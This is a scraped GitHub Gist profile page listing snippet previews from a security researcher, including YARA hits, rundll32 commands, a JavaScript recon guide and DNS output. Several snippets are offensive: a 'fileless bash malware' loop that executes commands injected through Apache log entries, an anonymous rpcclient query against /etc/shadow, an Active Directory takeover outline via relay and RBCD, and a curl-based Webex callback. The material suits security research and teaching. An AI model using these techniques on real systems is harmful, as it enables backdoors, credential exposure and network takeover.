Skip to content

Instantly share code, notes, and snippets.

View timb-machine's full-sized avatar

Tim Brown timb-machine

184 followers · 484 following
View GitHub Profile
@timb-machine
timb-machine / Yara rules firing
Created March 7, 2021 12:38
Yara rules firing
aix 10ac312c8dd02e417dd24d53c99525c29d74dcbc84730351ad7a4e0a4b1a0eba.xcoff
aix 3a5ba44f140821849de2d82d5a137c3bb5a736130dddb86b296d94e6b421594c.xcoff
aix ca9ab48d293cc84092e8db8f0ca99cb155b30c61d32a1da7cd3687de454fe86c.xcoff
aix d465637518024262c063f4a82d799a4e40ff3381014972f24ea18bc23c3b27ee.xcoff
enterpriseunix2 10ac312c8dd02e417dd24d53c99525c29d74dcbc84730351ad7a4e0a4b1a0eba.xcoff
enterpriseunix2 3a5ba44f140821849de2d82d5a137c3bb5a736130dddb86b296d94e6b421594c.xcoff
enterpriseunix2 ca9ab48d293cc84092e8db8f0ca99cb155b30c61d32a1da7cd3687de454fe86c.xcoff
enterpriseunix2 d465637518024262c063f4a82d799a4e40ff3381014972f24ea18bc23c3b27ee.xcoff
@timb-machine
timb-machine / Fileless bash malware
Last active August 30, 2025 21:31
Fileless bash malware
$ echo "while :; do grep "BAH~" /var/log/apache2/interesting.log | cut -f 2 -d \"~\" | tr '_' ' '; done" | exec bash
$ wget --no-check-certificate 'https://interesting/?BAH~touch_/tmp/foo~'
root 10680 10679 0 21:27 pts/1 00:00:00 /bin/bash
root 11125 10680 17 21:27 pts/1 00:00:02 bash
$ ls /proc/11125/fd
total 0
dr-x------ 2 root root 0 Jun 28 21:27 .
@timb-machine
timb-machine / Windows command line gui access.md
Created July 12, 2021 06:17 — forked from scotgabriel/Windows command line gui access.md
Common windows functions via rundll user32 and control panel

Rundll32 commands

OS: Windows 10/8/7

Add/Remove Programs

  • RunDll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0

Content Advisor

  • RunDll32.exe msrating.dll,RatingSetupUI

Control Panel

@timb-machine
timb-machine / dump-authentication-state.patch
Created July 21, 2021 13:25
dump-authentication-state.patch
Description: Dump the authentication state to understand the hashing algorithms
Dump the authentication state to understand the hashing algorithms.
Specifically, caching_sha2_password and mysql_native_password.
.
mysql-8.0 (8.0.23-0ubuntu0.20.04.1) focal-security; urgency=medium
.
* SECURITY UPDATE: Update to 8.0.23 to fix security issues
- CVE-2021-2002, CVE-2021-2010, CVE-2021-2011, CVE-2021-2021,
CVE-2021-2022, CVE-2021-2024, CVE-2021-2031, CVE-2021-2032,
CVE-2021-2036, CVE-2021-2038, CVE-2021-2046, CVE-2021-2048,
@timb-machine
timb-machine / JavascriptRecon.md
Created July 25, 2021 17:24
My Javascript Recon Process - BugBounty

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

  • The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)
@timb-machine
timb-machine / Workstation-Takeover.md
Created July 26, 2021 09:13 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@timb-machine
timb-machine / Yo Samba, what files do you have?
Last active August 30, 2025 16:46
Yo Samba, what files do you have?
$ echo netfilegetsec 'IPC$' /etc/shadow | rpcclient -U '%' 10.10.10.3
revision: 1
type: 0x9004: SEC_DESC_DACL_PRESENT SEC_DESC_DACL_PROTECTED SEC_DESC_SELF_RELATIVE
DACL
ACL Num ACEs: 3 revision: 2
---
ACE
type: ACCESS ALLOWED (0) flags: 0x00
Specific bits: 0x1ff
Permissions: 0x1e01ff: SYNCHRONIZE_ACCESS WRITE_OWNER_ACCESS WRITE_DAC_ACCESS READ_CONTROL_ACCESS
@timb-machine
timb-machine / macOS-IR-Forensics.md
Created August 3, 2021 08:24 — forked from 0xmachos/macOS-IR-Forensics.md
If someone wants to learn MacOS IR/forensics what’s the best resource for that?
@timb-machine
timb-machine / dig any wearekuiper.com
Created August 5, 2021 10:55
dig any wearekuiper.com
$ dig any wearekuiper.com
; <<>> DiG 9.10.6 <<>> any wearekuiper.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 11921
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 13
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
@timb-machine
timb-machine / Webex Teams as a callback
Created October 6, 2021 22:30
Webex Teams as a callback
# setup webex bot auth token env var - get auth here: https://developer.webex.com/my-apps/new/bot
export WEBEX_TOKEN="GET_TOKEN_ABOVE"
# get room id
WEBEX_ROOMID=$(curl --request GET --header "Authorization: Bearer $WEBEX_TOKEN" https://webexapis.com/v1/rooms |jq -r '.items[] | select(.title == "Room Name") | .id')
# post message
WEBEX_MSG="notification here"
curl --request POST --header "Authorization: Bearer $WEBEX_TOKEN" --form "roomId=$WEBEX_ROOMID" --form "text=$WEBEX_MSG" https://webexapis.com/v1/messages